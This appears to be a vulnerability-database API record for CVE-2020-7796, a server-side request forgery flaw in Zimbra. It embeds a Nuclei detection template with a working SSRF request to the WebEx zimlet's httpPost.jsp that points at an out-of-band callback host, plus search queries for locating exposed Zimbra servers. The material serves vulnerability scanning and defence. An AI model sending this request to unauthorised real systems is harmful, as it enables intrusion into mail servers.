{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-7796/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-7796/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-7796/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-7796/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-7796/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-7796"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-7796"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.84418,
      "kev": true,
      "percentile": 0.99688
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-7796.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2020-7796\n\ninfo:\n  name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery\n  author: gy741\n  severity: critical\n  description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage.\n  remediation: |\n    Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability.\n  reference:\n    - https://www.adminxe.com/2183.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-7796\n    - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-7796\n    cwe-id: CWE-918\n    epss-score: 0.84418\n    epss-percentile: 0.99688\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n    google-query:\n      - intitle:\"zimbra collaboration suite\"\n      - intitle:\"zimbra web client sign in\"\n  tags: cve,cve2020,zimbra,ssrf,oast,synacor,vkev,vuln,kev\n\nhttp:\n  - raw:\n      - |\n        GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 4a0a00473045022100bf3464b744195ef14de4dc3711bf3dcb3382063134a5cca27f7ab1a5d7487b9e022064ff8c1567039c57f31375adcf117da367f9fda3465e967685199e104e6e0044:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-7796"
}